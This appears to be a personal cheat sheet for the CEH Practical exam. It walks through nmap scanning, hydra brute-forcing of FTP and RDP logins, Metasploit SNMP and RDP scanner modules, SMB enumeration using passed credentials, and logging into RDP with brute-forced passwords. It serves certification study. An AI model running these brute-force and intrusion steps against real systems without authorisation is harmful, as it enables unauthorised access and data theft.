My CEHpractica Lcheat Sheet
My CEHpractica Lcheat Sheet
1. Nmap
2. Wireshark
3. Metasploit
4. Hydra
5. Cryptool / BCTextEncoder
6. Veracrypt
7. Burp suite
8. Hydra
9. Hashes.com/HashMyfiles/HashCalc
10. Snow steganography/OpenStego/Covert TCP
11. SQL Injection / nslookup/sqlmap/nikto
12. Android Debugging Bridge (adb)
Phases
1. Network Scanning & Vulnerability Assessment
Find Live hosts (nmap /netdiscover)
Sudo nmap [IP address] – for exam (CEH Practical)
o Sudo nmap –sC –sV –v –A –p– –O –T4 [IP Address range] – more aggressive
deep scanning
o Sudo nmap –sV –script vuln [IP Address] – finding vulnerabilities in a host (-
oX save file)
o Sudo nmap –sP 192.168.1.*:- when scanning a large network
Find open ports & services running on those ports (nmap)
Sudo nmap –sC –sV –v –p– –T4 [IP Address range]
2. Enumeration
ftp port 21 – used to transfer files between computers (file sharing)
o check IP to see which is running ftp
nmap –sC –p 21 [IP address]
o ftp [IP] :- you need to bruteforce the password login credentials using hydra
tool
hydra –L username.txt –P password.txt [IP address] ftp ( the lists of
password & usernames are given in the exam)
login ftp [IP address]
o enter password and username from the one that you brute forced
o ftp>ls
o ftp> get secret.txt (used to download the file into your local machine)
o root@attacker:~#ls
o root@attacker:~#cat secret.txt (to view the file contents)
SNMP port 161– used to monitor and manage network devices e.g. routers,
switches, servers etc.
o Nmap –sP [IP /24]
o Nmap –sU [IP Address] (scan for UDP ports on the target machine)
o snmp-check [ip address] NB take note of the UDP port to listen to)
o check NSE scripts online on nmap.org
o nmap –sU –p 161(UDP port) –script=snmp-processes [IP Address] ( finding
running process using nmap
o msfconsole (start Metasploit to find valid strings)
o msf5>search snmp
o msf5>use auxiliary/scanner/snmp/snmp_login
o msf5 auxiliary(scanner/snmp/snmp_login)> show options
o msf5 auxiliary(scanner/snmp/snmp_login)>set RHOSTS [IP Address]
o msf5 auxiliary(scanner/snmp/snmp_login)>exploit
SNMP check interfaces
o nmap –sU –p 161(UDP port) –script=snmp-interfaces [IP Address] ( finding
running process using nmap
o snmp-check [IP address]
SMB Enumeration (SMB request services from server programs, it’s a protocol that
allows apps on a computer read/write files)
o Nmap [target IP] (smb running on port 445)
o Nmap –p 445 --script smb-enum-shares [IP address] (enumerating files)
shares files with details permissions
o Connecting GUI method (smb://[IP] on web)
o Nmap –p 445 --script smb-enum-users --script-args
smbusername=administrator,smbpassword=smbserver_771 [IP address]
(enumerating users)
o Nmap –p 445 --script smb-enum-groups --script-args
smbusername=administrator,smbpassword=smbserver_771 [IP address]
(enumerating groups)
o Nmap –sC –sV –A –T4 –p445 [IP Address] (enumerating security levels)
o Nmap –p 445 --script smb-enum-services --script-args
smbusername=administrator,smbpassword=smbserver_771 [IP address]
(enumerating services)
o
Making an RDP session and Enumerate RDP service
o Nmap [Ip address] port 3333 or 3389 is for RDP
o Msfconsole
o msf5> search rdp
o msf5>use auxiliary/scanner/rdp/rdp_scanner
o msf5 auxiliary(scanner/rdp/rdp_scanner)> set RHOSTS [target IP]
o msf5 auxiliary(scanner/rdp/rdp_scanner)>set RPORT 3333
o msf5 auxiliary(scanner/rdp/rdp_scanner)>exploit (detected rdp on …..
confirmed rdp is running)
o hydra –L {path} –P{path} rdp://[IP address] –s 3333 (brute force passwords
& save them)
o root@attacker:~# xfreerdp /u:administrator /p:etcect /v:[ip]:3333(create an
rdp session)
Enumerate NetBIOS port 137(UDP: TCP)/138(UDP)/139(TCP) facilitates and allows
computer to connect over the local network, access files & resources such as
printers & files
o Check ip first by ip a
o Nmap –sP [IP address]
o Nmap –sV --script nbstat.nse [IP address]
Go Buster
Review ippsec